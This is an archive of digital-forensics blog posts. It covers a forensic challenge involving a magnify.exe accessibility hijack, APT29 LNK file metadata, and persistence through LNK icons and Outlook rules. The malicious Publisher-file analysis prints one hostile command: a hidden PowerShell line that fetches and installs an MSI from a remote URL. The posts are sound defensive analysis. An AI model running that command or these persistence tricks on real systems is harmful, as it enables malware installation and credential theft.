Tuesday, January 15, 2019

Just For Fun...

OS/2Warp running in VirtualBox
When I started graduate school in June 1994, I showed up having used Win3.1 and AOL for dial-up.  While in grad school, I began using Sparc systems running SunOS (web browser was Netscape), which is what was available in the curriculum I was in.  I also got to interact and engage with a lot of other now-historical stuff, and over time, I've had passing feelings of sentimentality and nostalgia.

After I arrived in CA, I was shown PPP/SLIP dial-up for Windows systems, and was fascinated with the configuration and use, mostly because now, I was one of the cool kids.  For a while, I dabbled with the idea of a dual degree (EE/CS, never committed to it) and came in pretty close contact with folks from the CS department.  As it turned out, there were more than a few folks in the CS department who were interested in OS/2, including one of the professors who had a program that would sort and optimize the boot-up sequence for OS/2 so that it would load and run faster.

Also, it didn't hurt that I attended grad school was not far from Silicon Valley, the center of the universe for tech coolness at the time.  In fact, the EE curriculum had a class each summer called "hot chips" where we studied the latest in microprocessor technology, and corresponded with the "Hot Chips" conference in San Jose.  The class was taught by Prof. F. Terman, the son of the other Fred Terman.

While I was in grad school, I was eventually introduced to OS/2.  I purchased a copy of OS/2 2.1 at Frye's Electronics (in SunnyVale, next to Weird Stuff), specifically because the box came with a sticker/coupon for $15 off of OS/2 Warp 3.0.  I enjoyed working with OS/2 at the time; I could dial into my local ISP (Garlique.com at the time), connect to the school systems, and run multiple instances of MatLab programs I'd written as part of a course.  I could then either connect later and collect the output, or simply have it available when I arrived at the school. 

I had no idea at the time, but for the first four months or so that I was at NPS, I walked by Gary Kildall's office almost every day.  I never did get to see CP/M in action, but anyone who's ever used MS-DOS has interacted with a shadow of what CP/M once was and was intended to be.

While I was in grad school, I had two courses in assembly language programming, both based on the Motorola 68000, the microprocessor used in Amiga systems.  I never owned an Amiga as a kid, but while I was in grad school, there was someone in a nearby town who ran a BBS based on Amiga, and after grad school, I did see an Amiga system at a church yard sale. 

While I was in the Monterey/Carmel area of California, I also became peripherally aware of such oddities of the tech world as BeOS and NeXT.

Looking back on all this, I was active duty military at the time, and could not have afforded to pull together the various bits and pieces to lay the foundation for a future museum.  Also, for anyone familiar with the system the military uses to move service members between duty stations, this likely would not have survived (ah, the stories...).  However, thanks to virtualization systems such as VirtualBox, you can now pull together a museum-on-a-hard-drive, by either downloading the virtual images, or collecting the necessary materials and installing them yourself.  As you can see from the image in this post, I found an OS/2Warp VB image available online.  I don't do much with it, but I do remember that the web browser was the first one I encountered that would let you select an image in a web page and drag it to your desktop.  At the time, that was some pretty cool stuff!

Resources (links to instructions, not all include images or ISO files)
VirtualBox BeOS R5
VirtualBox Haiku (inspired by BeOS) images (there's also a Plan 9 image...just sayin'...)
NeXT in VirtualBox: NeXTSTEP, stuffjasondoes
Virtually Fun - CPM/86
VirtualBox Amiga

Wednesday, January 09, 2019

A Tale of Two Analyses

I recently shared my findings from an analysis challenge that Ali posted, and after publishing my post, found out that Adam had also shared his findings.  Looking at both posts, it's clear that there are two different approaches, and as I read through Adam's findings, it occurred to me that this is an excellent example of what I've seen time and time again in the industry. 

Adam and I have never met, and I know nothing at all about his background.  I only know that Adam's blog has (at the time of this writing) a single post, from 2 Jan 2019.  On the other hand, my blogging goes back to 2004, and I've been in the industry for over 21 years, with several years of service prior to that.  All this is intended to point out is that Adam and I each come to the table with a different perspective, and given the same data, will likely approach it differently.

A good deal of my experience is in the consulting arena, meaning that engagements usually start with a phone call, and in most cases, it's very likely that the folks I work with weren't the first to be called, and won't be the last.  Yes, I'm saying that in some cases, consumers of digital analysis services shop around.  This isn't a bad thing, it's simply meant to indicate that they're looking for the "best deal".  As such, cases are "spec'd out" based on a number of hours...not necessarily the number of hours it will take to complete the work, but more so the number of hours a customer is willing to purchase for the work they want done.  The nature outcome of this is that once the customer's questions have been established, the analyst assigned the work needs to focus on answering the questions.  Otherwise, time spent pursuing off-topic issues or "rabbit holes" increases the time it takes to complete the work, which isn't billed to the customer.  As such, the hourly rate drops, and it can drop to the point where the company looses money on the work.

All of this is meant to say that without an almost pedantic focus on the questions at hand, an analyst is going to find themselves not making friends; reports won't be delivered on time, additional analysts will need to be assigned to actually complete the work, and someone may have their approved vacation rescinded (I've actually seen this happen...) in order to get the work done.

When I read the challenge, my focus was on the text that the admin saw and reported.  As such, my analysis goal, before even downloading the challenge image, was to determine the location of the file on the system, and then determine how it got there.

However, I approached Ali's first question of how the system was hacked a little differently; I've dealt with a lot of customers in two decades who've asked how something was "hacked", and I've had to keep in mind that their use of the term is different from mine.  For me, "hacked" refers to exploiting a vulnerability to gain access to a system, escalate privileges, and/or essentially take actions for which the system and data were never intended.  I didn't go into the analysis assuming that the system was "hacked"...I approached my analysis from the perspective that the focus of main effort for my analysis was the message that the admin had reported, and any "hacking" of the system would be within some modicum of temporal proximity to that file being created and/or modified.  As such, a timeline was in order, and this approach helped me with question #2, regarding "evidence".  In fact, creating micro-timelines or "overlays" allowed me to target my analysis.  At one point, I created a timeline of just logon events from the Security Event Log.  In order to prove that the Administrator account was used to create the target readme.txt file, I created micro-timelines for both user profiles, using just web browser and Registry (specifically, shellbags and RecentDocs) data.

From my overall timeline, I found when the "C:\Tools\readme.txt" file had been created, and I then used that as a pivot point for my analysis.  This is how I arrived at the finding that the Administrator account had been used to create the file.

From my perspective, the existence of additional text files (i.e., within a folder on the "master" profile desktop), who created them and when, the modification to magnify.exe, and the system time change all fell into the same bucket for question #4 (i.e., "anything you would like to add").  All of these things fell out of the timeline rather easily, but I purposely did not pursue further analysis of things such as the execution of magnify.exe, net.exe, and net1.exe, as I had already achieved my analysis goal.

Again, in my experience as a consultant, completing analysis work within a suitable time frame (one that allows the business to achieve it's margins) hinges upon a focus on the stated analysis goals. 

I've seen this throughout my career...a number of years ago, I was reviewing a ransomware case as part of an incident tracking effort, and noticed in the data that the same vulnerability used to compromise the system prior to ransomware being deployed had been used previously to access the system and install a bitcoin miner.  As the customer's questions specifically focused on the ransomware, analysis of the bitcoin miner incident hadn't been pursued.  This wasn't an issue...the analyst hadn't "missed" anything.  In fact, the recommendations in the report that applied to the ransomware issue applied equally well to the bitcoin miner incident.

A Different Perspective
It would seem, from my reading (and interpretation) of Adam's findings that his focus was more on the "hack".  Early on in his post, Adam's statement of his analysis goals corresponded very closely to my understanding of the challenge:

We are tasked with performing an IR investigation from a user who reported they've found a suspicious note on their system. We are given only the contents of the message (seen below) without its file path, and also no time at which the note was left.

...and...

Since we can understand that this note was of concern to the user, it is very important to start developing a time frame of before the note was created to understand what led to this point. This will allow the investigator to find the root cause efficiently.

Adam went on to describe analyzing shellbags artifacts, but there was no indication in his write-up that he'd done a side-by-side mapping of date/time stamps, with respect to the readme.txt file to the shellbag artifacts.  Shortly after that, the focus shifted to magnify.exe, and away from the text file in question.

Adam continued with a perspective that you don't often see in write-ups or reports; not only did he look up the hash of the file on VT, but he demonstrated his hypothesis regarding how magnify.exe might have been used, in a virtual machine.

In the end, however, I could not find where the question of how the "C:\Tools\readme.txt" file came to be on the system was clearly and directly addressed.  It may be there; I just couldn't find it.

Final Words
I did engage with the challenge author early this morning (9 Jan), and he shared with me the specifics of how different files (the files in a folder on one user's desktop) were created on the system.  I think that one of the major comments I shared with Ali was that not only was this challenge representative of what I've seen in the industry, but so are the shared findings.  No two analysts come to the table with the exact same experience and perspectives, and left to their own devices, no two analysts will approach and solve the same analysis (or challenge) the same way.  But this is where documentation and sharing is most valuable; by working challenges such as these, either separately or together, and then sharing our findings publicly, we can all find a way to improve every aspect of what we do.

Monday, January 07, 2019

Mystery Hacked System

Ali was gracious enough to make several of the challenges that he put together for his students available online, as well as for allowing me to include the first challenge in IWS.  I didn't include challenge #3, the "mystery hacked system" in the book, but I did recently revisit the challenge.  Ali said that it would be fine for me to post my findings.

As you can see, the challenge is pretty straightforward...an admin found a message "written on their system", and reported it.  The questions that Ali posed for the challenge were:
  1.  How was the system hacked?
  2. What evidence did you find that proved your hypothesis?
  3. How did you approach and solve the case?
  4. Anything you would like to add?
Below are my responses:

Question 1
Based on what I observed in the data, I would say that the system was not, in fact, hacked.  Rather, it appears that the Administrator user logged in from the console, accessed the C:\Tools folder and created the readme.txt file containing the message.

Question 2
I began with a visual inspection of the image, in order to verify that it could be opened, per SOP.  An initial view of the image indicated two user profiles (Administrator, master), and that there was a folder named "C:\Tools".  Within that folder was a single file named "readme.txt", which contained the text in question.

From there, I created a timeline of system activity, and started my analysis by locating the file 'C:\Tools\readme.txt' within the timeline, and I then pivoted from there.

The readme.txt file was created on 12 Dec 2015 at approx. 03:24:04 UTC.  Approx. 4 seconds later, the Automatic JumpList for Notepad within the Administrator profile was modified; at the same time, UserAssist artifacts indicated that Administrator user launched Notepad.

At the time that the file was created, the Administrator user was logged into the system via the console.  Shellbag artifacts for the Administrator account indicated that the account was used to navigate to the 'C:\Tools' folder via Windows Explorer.

Further, there were web browser artifacts indicating that Administrator account was used to view the file at 03:24:09 UTC on 12 Dec 2015, and that the 'master' account was used to view the file at 03:27:23 UTC on the same day.

Question 3
I created a timeline of system activity from several sources extracted from the image; file system metadata, Windows Event Log metadata, and Registry metadata.  In a few instances, I created micro-timelines of specific data sources (i.e., login events from the Security Event Log, activity related to specific users) to use as "overlays" and make analysis easier.

Question 4
Not related to the analysis goal provided were indications that the Administrator account had been used to access the Desktop\Docs folder for the 'master' user and created the 'readme.txt' file in that folder.

In addition, there was a pretty significant change in the system time, as indicated by the Windows Event Log:

Fri Dec 11 17:30:37 2015 Z
  EVTX     sensei            - [Time change] Microsoft-Windows-Kernel-General/1;
                                          2015-12-11T17:30:37.456000000Z,
                                          2015-12-12T03:30:35.244496800Z,1
*Time was changed TO 2015-12-11T17:30:37 FROM 2015-12-12T03:30:35

Finally, there was some suspicious activity on 12 Dec, at 03:26:13 UTC, in that magnify.exe was executed, as indicated by the creation and last modification of an application prefetch file. This indicates that this may have been the first and only time that magnify.exe had been executed.

Several seconds before that, it appeared that utilman.exe had been executed, and shortly afterward, net.exe and net1.exe were executed, as well.

Concerned with "Image File Execution Option" or accessibility hijacks, I searched the rest of the timeline, and found an indication that on 11 Dec, at approx. 19:18:54 UTC, cmd.exe had been copied to magnify.exe. This was verified by checking the file version information within magnify.exe.  Utilman.exe does not appear to have been modified, nor replaced, and the same appears to be true for osk.exe and sethc.exe.

Checking the Software hive, there do not appear to be any further "Image File Execution Option" hijacks.

I should note that per the timeline, the execution of magnify.exe occurred approx. two minutes after the message file was created.

Addendum:
After I posted this article and Ali commented, I found this blog posted by Adam which also provided a solution to the challenge.  Adam had posted his solution on 2 Jan, so last week.  I have to say, it's great to see someone else working these challenges and posting their solution.  Great job, Adam, and thanks for sharing!

Addendum, 9 Jan:
Based on a whim, I took a look at the USN change journal, and it proved to be pretty fascinating...more so, it showed that following the use of the net.exe/net1.exe, no files were apparently written to the system (i.e., output redirected to a file).  Very cool.

Tuesday, January 01, 2019

LNK Toolmarks, Revisted

There was a recent blog post and Twitter thread regarding the parsing and use of weaponized LNK file metadata. Based on some of what was shared during the exchange, I got to thinking about toolmarks again, and how such files might be created.  My thinking was that perhaps some insight could be gained from the format and structure of the file itself.  For example, the weaponized LNK files from the two campaigns appear to have valid structures, and there appear to have been no modifications to the LNK file structure itself.  Also, the files contained specific structures, including a PropertyStoreDataBlock and a TrackerDataBlock.  While this may not seem particular unusual, I have seen some LNK files that do not contain these structures.  I parsed an LNK file not long ago that did not contain a TrackerDataBlock.  As such, I thought I'd look at some ways, or at least one way, to create LNK files and see what the resulting files would "look like".

Several years ago, Adam had an excellent blog post regarding LNK hotkeys; I borrowed the VBS code (other examples and code snippets can be found here and here), and made some minor tweaks.  For example, I pointed the target path to calc.exe, ran the code, and then moved the file from the Desktop to a testing folder, changing the file extension in the process.  Running my own parser against the resulting LNK file, I found that it had a valid PropertyStoreDataBlock (containing the user SID), as well as a properly structured TrackerDataBlock.

These findings coincide with what I saw when running the parser against LNK files from both the 2016 and 2018 APT29/Cozy Bear campaigns.

You can also use PowerShell to create shortcuts, using the same API as the VBScript:
Create shortcuts in PowerShell
PowerShell script to modify an LNK file (target path)
Editing shortcuts in PowerShell

We also know that the LNK files used in those campaigns were relatively large, much larger than a 'normal' LNK file, because the logical file was extended beyond the LNK file structure to include additional payloads.  These payloads were extracted by the PowerShell commands embedded with in the LNK file itself.

Felix Weyne published a blog post that discussed how to create a booby-trapped LNK file (much like those from the APT29 campaigns) via PowerShell.

So, we have a start in understanding how the LNK files may have been created.  Let's go back and take another look at the LNK files themselves.

The FireEye blog post regarding the recent phishing campaign included an operational timeline in table 1.  From that table, the "LNK weaponized" time stamp was developed (at least in part) from the last modification DOSDate time stamp for the 'system32' folder shell item within the LNK file.  What this means is that the FireEye team stripped out and used as much of the LNK file metadata as they had available.  From my perspective, this is unusual because most write-ups I've seen regarding the use of weaponized LNK files (or really, any weaponized files) tend to give only a cursory overview of or reference to the file before moving on to the payloads. Even write-ups involving weaponized Word documents make mention of the file extension, maybe give a graphic illustrating the content, and then move on.

As described by the folks at JPCERT/CC, parsing of weaponized LNK files can give us a view into the attacker's development environment.  The FireEye team illustrated some of that by digging into the individual shell items and incorporating the embedded DOSDate time stamps in their analysis, and subsequently the operational timeline they shared in their post.

There's a little bit (quite literally, no pun intended...) more that we can tease out of the LNK file.  The VBScript that I ran to create an LNK file on my Windows 10 test system.  Figure 1 shows the "version" field (in the green box) for one of the shell items in the itemIDList from the LNK file.

Fig. 1: Excerpt from "foo" LNK file





In figure 1, the version is "0x09", which corresponds to a Windows 10 system (see section 6.5 of Joachim Metz's Windows Shell Item format specification).

Figure 2 illustrates the shell item version value (in the red box) from the approximate corresponding location in the APT29 LNK file from the 2018 campaign.

Fig. 2: Excerpt from APT29 LNK file





In figure 2, the version field is "0x08", which corresponds to Windows 7 (as well as Windows 8.0, and Windows 2008).  It may not be a lot, but as the versions of Windows continue to progress, this will have more meaning.

Finally, some things to consider about the weaponized LNK files...

All of the shell items in both LNK files have consistent extension blocks, which may indicate that they were created through some automated means, such as via an API, and not modified (by hand or by script) as a means of defense evasion.

So, what about that?  What is the effect of individual shell items, and to the entire LNK file, if modifications are made?  From figure 1, I modified the version value to read 0x07 instead of 0x09, and the shortcut performed as expected.  Modifications to weaponized LNK files such as these will very likely affect parsers, but for those within the community who wrote the parsers and understand the LNK file structure (along with associated shell item structures), such things are relatively straightforward to overcome (see my previous "toolmarks" blog post).

Final Words
Using "all the parts of the buffalo", and fully exploiting the data that you have available, is the only way that you're going to develop a full intelligence picture. Some of what was discussed in this post may not be immediately useful for, say, threat hunting within an infrastructure, but it can be used to develop a better understanding of the progression of techniques employed by actors, and provide a better understanding of what to hunt for.

Additional Reference Material
Joachim Metz's Windows Shell Item format specification
Link to reported bash and C versions of a tool to create LNK files on Linux

Saturday, December 29, 2018

Parsing the Cozy Bear LNK File

November 2018 saw a Cozy Bear/APT29 campaign, discussed in FireEye's blog post regarding APT29 activity (from 19 Nov 2018), as well as in this Yoroi blog regarding the Cozy Bear campaign (from 21 Nov 2018).  I found this particular campaign a bit fascinating, as it is another example of actors sending LNK files to their target victims, LNK files that had been created on a system other than the victim's.

However, one of the better (perhaps even the best) write-up regarding the LNK file deployed in this campaign is Oleg's description of his process for parsing that file.  His write-up is very comprehensive, so I won't steal any of his thunder by repeating it here.  Instead, I wanted to dig just a bit deeper into the LNK file structure itself.

Using my own parser, I extracted metadata from the LNK file structure for the "ds7002.lnk" file. The TrackerDataBlock includes much of the same information that Oleg uncovered, including the "machine ID", which is a 16-byte field containing the NetBIOS name of the system on which the LNK file was created:

***TrackerDataBlock***
Machine ID            : user-pc
New Droid ID Time     : Thu Oct  6 17:03:04 2016 UTC
New Droid ID Seq Num  : 13273
New Droid    Node ID  : 08:00:27:92:24:e5
Birth Droid ID Time   : Thu Oct  6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID   : 08:00:27:92:24:e5

From the TrackerDataBlock, we can also see one of the MAC addresses recognized by the system.  Using the OUI lookup tool from Wireshark, we see that the OUI for the displayed MAC address points to "PcsCompu PCS Computer Systems GmbH".  From WhatsMyIP, we get "Pcs Systemtechnik Gmbh".

Further, there's a SID located in the PropertyStoreDataBlock:

***PropertyStoreDataBlock***
SID: S-1-5-21-1764276529-1526541935-4264456457-1000

Finally, there's the volume serial number embedded within the LNK file:

vol_sn             C4B2-BD1C

A combination of the volume serial number, maching ID, and the SID from the PropertyStoreDataBlock can be used to create a Yara rule, which can then be submitted as a retro-hunt on VirusTotal, in order to locate other examples of LNK files created on this system.

Note that the FireEye write-up mentions a previous campaign (described by Volexity) in which a similar LNK file was used.  In that case, MAC address, SID, and volume serial number were identical to the ones seen in the LNK file in the Nov 2018 campaign.  The file size was different, and the embedded PowerShell command was different, but the rest of the identifying metadata remained the same two years later.

Another aspect of the LNK file from the Nov 2018 campaign is the embedded PowerShell command.  As Oleg pointed out, the PowerShell command itself is encoded, as a base64 string.  Or perhaps more accurately, a "base" + 0x40 encoded string.  The manner by which commands are obfuscated can be very telling, and perhaps even used as a means for tracking the evolution of the use of the technique.

This leads to another interesting aspect of this file; rather than using an encoded PowerShell command to download the follow-on payload(s), those payloads are included encoded within the logical structure of the file itself.  The delivered LNK file is over 400K in size (the LNK file from 2016 was over 660K), which is quite unusual for such a file, particularly given that the LNK file structure itself ends at offset 0x0d94, making the LNK file 3476 bytes in size.

Oleg did a great job of walking through the collection, parsing and decoding/decryption of the embedded PDF and DLL files, as well as of writing up and sharing his process.  From a threat intel perspective, identifying information extracted from file metadata can be used to further the investigation and help build a clearer intel picture.

Addendum, 31 Dec: Here's a fascinating tweet thread regarding using DOSDate time stamps embedded in shellitems to identify "weaponization time" of the LNK file, and here's more of that conversation.

Friday, December 28, 2018

PUB File

Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before).  The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself.  MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.

Why would I bother doing this?  For one, I believe that there is a good bit of value that does unrealized when we don't look at artifacts like this, value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.

I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.

The first thing I did was run 'strings' against the file.  Below are some of the more interesting strings I was able to find in the file:

E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar 
alabama

Document created using the application not related to Microsoft Office

For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.

"-executionpolicy bypass -noprofile -w hidden  -c & ""msiexec"" url1=gmail url2=com  /q /i http://homeofficepage[.]com/TabSvc"

Shceduled update task

One aspect of string searches in OLE format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file.  What this means is that the streams themselves are not contiguous, and that strings contained in the file may possibly be separated across the sectors.  For example, it is possible that for the string "alabama" listed above, part of the string (i.e., "ala") may exist in one sector, and the remaining portion of the string may exist in another sector, so that searching for the full string may not find all instances of it.  Further, with the use of macros, the macros themselves are compressed, throwing another monkey wrench into string searches.

Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings.  For example, note the misspelling of "Shceduled".  This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure.  Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word.  ;-)

The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.

Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:

Root Entry  Date: 20.11.2018, 14:40:11  CLSID: 00021201-0000-0000-00C0-000000000046
    1 D..       0 20.11.2018, 14:40:11 \Objects
    2 D..       0 20.11.2018, 14:40:11 \Quill
    3 D..       0 20.11.2018, 14:40:11 \Escher
    4 D..       0 20.11.2018, 14:40:11 \VBA
    7 F..   10602                                \Contents
    8 F.T      94                                  \CompObj
    9 F.T   16384                                \SummaryInformation
   10 F.T     152                                \DocumentSummaryInformation
   11 D..       0 20.11.2018, 14:40:11 \VBA\VBA
   12 D..       0 20.11.2018, 14:40:11 \VBA\crysler
   18 F..     387                                 \VBA\crysler\f
   19 F..     340                                 \VBA\crysler\o
   20 F.T      97                                 \VBA\crysler\CompObj
   21 F..     439                                 \VBA\crysler\ VBFrame
   22 F..     777                                 \VBA\VBA\dir
   23 FM.    1431                              \VBA\VBA\crysler
   30 FM.    8799                              \VBA\VBA\ThisDocument
   
As you can see, there are a number of streams that include macros.  Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.

Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way.  In fact, the two visible macros are well-structured, and don't appear do much at all; the malicious functionality appears to embedded someplace else within the file itself.

Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day.  In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information.  In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful.  Unfortunately, it's in a tweet thread and not some more permanent format.

I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents.  This includes OLE-format Word and Publisher documents, as well.  Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.

Wednesday, December 19, 2018

Hunting and Persistence

Sometimes when hunting, we need to dig a little deeper, particularly where the actor employs novel persistence mechanisms.  Persistence mechanisms that are activated by some means other than a system start or user login can be challenging for a hunter to root (pun intended) out.

During one particular hunting engagement, svchost.exe was seen communicating out to a known-bad IP address, and the hunters needed to find out a bit more about what might be the cause of that activity.  One suggestion was to determine the time frame or "temporal proximity" of the network activity to other significant events; specifically, determine whether something was causing svchost.exe to make these network connections, or find out if this activity was being observed "near" a system start. 

As it turned out, the hunters in that case had access to data that had been collected as part of the EDR installation process (i.e., collect data, install EDR agent), and were able to determine the true nature of the persistence.

Sometimes, persistence mechanisms aren't all that easy, nor straightforward to determine, particularly if the actor had established a foothold within the target infrastructure prior to instrumentation being put in place.  It is also difficult to determine persistence within an infrastructure when complete visibility has not been achieved, and there are "nexus systems" that do not have the benefit of instrumentation.  The actor may be seen interacting with instrumented systems, but those systems may be ancillary to their activity, rather than the portal systems to which they continually return.

One persistence mechanism that may be difficult to uncover is the use of the "icon filename" field within Windows shortcut/LNK files.  Depending upon where the LNK file is located on the system (i.e., not in the user's StartUp folder), the initiation of the malicious network connection may not be within temporal proximity of the user logging into the system, making it more difficult to determine the nature of the persistence.  So how does this persistence mechanism work?  Per Rapid7, when a user accesses the shortcut/LNK file, SMB and WebDav connections are initiated to the remote system.

Also, from here:

Echoing Stuxnet, the attackers manipulated LNK files (Windows shortcut files), to conduct malicious activities. In this case, they used LNK files to gather user credentials when the LNK file attempted to load its icon from a remote SMB server controlled by the attackers.

As you can see, this persistence method would then lead to the user's credentials being captured for cracking, meaning that the actor may be able return to the environment following a global password change. Be sure to check out this excellent post from Bohops that describes ways to collect credentials to be cracked.

Another persistent mechanism that may be difficult for hunters to suss out is the use of OutLook rules (description from MWR Labs, who also provide a command line tool for creating malicious OutLook rules, which includes a switch to display existing rules).  In short, an actor with valid credentials can access OWA and create an Outlook rule that, when the trigger email is received, can launch a PowerShell script to download and launch an executable, or open a reverse shell, or take just about any other action.  Again, this persistence mechanism is completely independent of remediation techniques, such as global password changes.

Additional Resources
MS recommendations to detect and remediate OutLook rules
Detecting OutLook rules WRT O365, from TechNet

Addendum, 21 Dec: FireEye blog post references SensePost's free tool for abusing Exchange servers and creating client-side mail rules.

Addendum, 24 Dec: Analysis of LNK file sent in the Cozy Bear campaign